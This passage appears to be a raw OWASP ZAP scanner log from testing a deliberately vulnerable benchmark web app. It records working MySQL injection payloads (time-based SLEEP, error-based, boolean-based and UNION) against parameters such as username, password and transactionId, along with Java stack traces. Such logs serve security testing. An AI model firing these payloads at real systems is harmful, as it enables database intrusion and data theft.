x)a) AND 'Txfn'='Txfn] on parameter 'transactionDate' 9612440 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9612474 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))LpZc) AND 'FzFF'='FzFF] on parameter 'transactionDate' 9612475 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9612605 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9612615 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9612634 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 7303=7303 AND 'QJLj'='QJLj] on parameter 'transactionDate' 9612637 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9612642 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 6930 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6930=6930,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qMml'='qMml] on parameter 'transactionDate' 9612642 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9622475 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))CRRa) AND 'aUPR'='aUPR] on parameter 'transactionDate' 9622476 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9622515 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9622520 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9622525 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9622530 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9622580 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9622587 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9622590 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9622594 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9622662 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (2789=2789) THEN 2789 ELSE 2789*(SELECT 2789 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9622663 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9622667 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 4543 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4543=4543,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgid' 9622667 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9622675 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))pSyt) AND 'bzzC'='bzzC] on parameter 'transactionDate' 9622676 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9622831 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9622832 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9623052 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (6007=6007) THEN 6007 ELSE 6007*(SELECT 6007 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9623053 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9623056 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 4539 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4539=4539,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'orderby' 9623057 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9632721 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))SKLZ)] on parameter 'msgid' 9632722 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9633049 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 5254=5254] on parameter 'minBalanace' 9633049 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9633052 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [10000 AND (SELECT 3160 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3160=3160,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'minBalanace' 9633053 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9633088 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))cfuy)] on parameter 'orderby' 9633089 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9633792 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'msg' is not injectable 9633863 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (4302=4302) THEN 4302 ELSE 4302*(SELECT 4302 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionId' 9633864 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9633899 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 error-based - Parameter replace with payload [(SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3518=3518,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionId' 9633900 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9643088 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))Ucvj)] on parameter 'minBalanace' 9643089 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9643102 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9643108 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9643145 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9643152 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9643165 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9643171 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9643205 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9643212 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9643268 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (4540=4540) THEN 4540 ELSE 4540*(SELECT 4540 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgId' 9643269 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9643271 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 1727 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1727=1727,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgId' 9643272 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9643937 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))PuVH)-- ScSN] on parameter 'transactionId' 9643938 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9643959 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9643963 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9644006 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9644010 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9644039 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9644043 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9644044 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'transactionId' 9644045 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9644068 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (8335=8335) THEN 8335 ELSE 8335*(SELECT 8335 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9644069 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9644071 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [msgid AND (SELECT 9498 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9498=9498,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'orderby' 9644074 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9653303 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))hoAy)] on parameter 'msgId' 9653304 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9653409 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9653410 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9654102 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [msgid AND (SELECT * FROM (SELECT(SLEEP(5)))wHSl)] on parameter 'orderby' 9654103 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9663576 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP' AND (SELECT * FROM (SELECT(SLEEP(5)))jtvP) AND 'naam'='naam] on parameter 'username' 9663577 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9663614 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9663620 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9663623 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9663628 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9663683 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9663688 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9663691 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9663698 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9663889 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [ZAP%' AND (SELECT 1463 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1463=1463,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] on parameter 'msg' 9663890 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9664346 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [rtsXiYrP' AND (SELECT * FROM (SELECT(SLEEP(5)))Oifb) AND 'PLBP'='PLBP] on parameter 'username' 9664347 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9664388 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9664393 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9664397 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9664404 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9664454 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9664470 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9664471 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [rtsXiYrP' #] on parameter 'username' 9664472 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9673927 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP%' AND (SELECT * FROM (SELECT(SLEEP(5)))flFq) AND '%'='] on parameter 'msg' 9673928 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9674057 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [ZAP' #] on parameter 'msg' 9674058 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9674739 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [' AND (SELECT * FROM (SELECT(SLEEP(5)))gVPT) AND 'dIey'='dIey] on parameter 'password' 9674743 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9674787 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9674792 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9674796 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9674803 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9674857 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9674864 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9674865 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [' #] on parameter 'password' 9674866 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9675218 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'transactionDate' is not injectable 9675236 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'transactionDate' is not injectable 9675703 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'username' is not injectable 9675723 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'username' is not injectable 9676192 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 9676219 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 9676634 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'username' is not injectable 9676642 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'username' is not injectable 9676892 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 9676908 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 9677231 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'username' is not injectable 9677234 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'username' is not injectable 9677764 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 9677764 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 9678201 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'username' is not injectable 9678219 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'username' is not injectable 9678604 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 9678616 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'password' is not injectable 9679190 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 1978=5695 AND (3997=3997] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 1978=5695 AND (3997=3997 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679191 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 4492=1273 AND (1550=1550] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 4492=1273 AND (1550=1550 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 